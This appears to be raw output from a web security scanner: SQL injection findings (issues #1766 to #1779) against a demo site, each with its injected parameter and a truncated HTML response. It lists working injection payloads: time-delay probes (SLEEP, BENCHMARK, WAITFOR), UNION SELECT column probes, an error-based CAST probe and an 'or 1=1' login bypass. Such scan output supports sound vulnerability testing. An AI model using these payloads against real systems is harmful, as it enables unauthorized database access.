@@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,\nNULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1766\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1767\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 16--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1768Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '));waitfor delay '0:0:5'--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1769\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\n\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </\nscript> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\"\nsrc=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-\nbfb86b515320\"> </script> --> <!-- End of Zendesk Widget script --> <!-- \nBootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:\nimage/png;base64,iVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJ\nbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQ\nIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary \nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1770\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1771\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters DemoUser1# UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1772\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# admin' or '1'='1'/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#CWE-ID CWE-89\nIssue Number #1773\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 3#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1774\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1775\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# AND 3516=CAST((CHR(113)||CHR(106)||CHR(122)||CHR(106)||\nCHR(113))||(SELECT (CASE WHEN (3516=3516) THEN 1 ELSE \n0 END))::text||(CHR(113)||CHR(112)||CHR(106)||CHR(107)||CHR(\n113)) AS NUMERIC)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1776\nScan SQL InjectionSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ,(select * from (select(sleep(10)))a)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1777\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1\n#UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title>\nDeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"width=\ndevice-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/cdn-cgi/apps/\nhead/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> \nwindow.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER__\"; </script> <!-- Start \nof Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://\nstatic.zdassets.com/ekr/snippet.js?key=c377ac9e-9a0a-4c32-aed4-bfb86b515320\"> \n</script> --> <!-- End of Zendesk Widget script --> <!-- Bootstrap CSS --> <\nlink rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZSBJbW\nFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCgAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary hints\non your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1778\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1779\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL 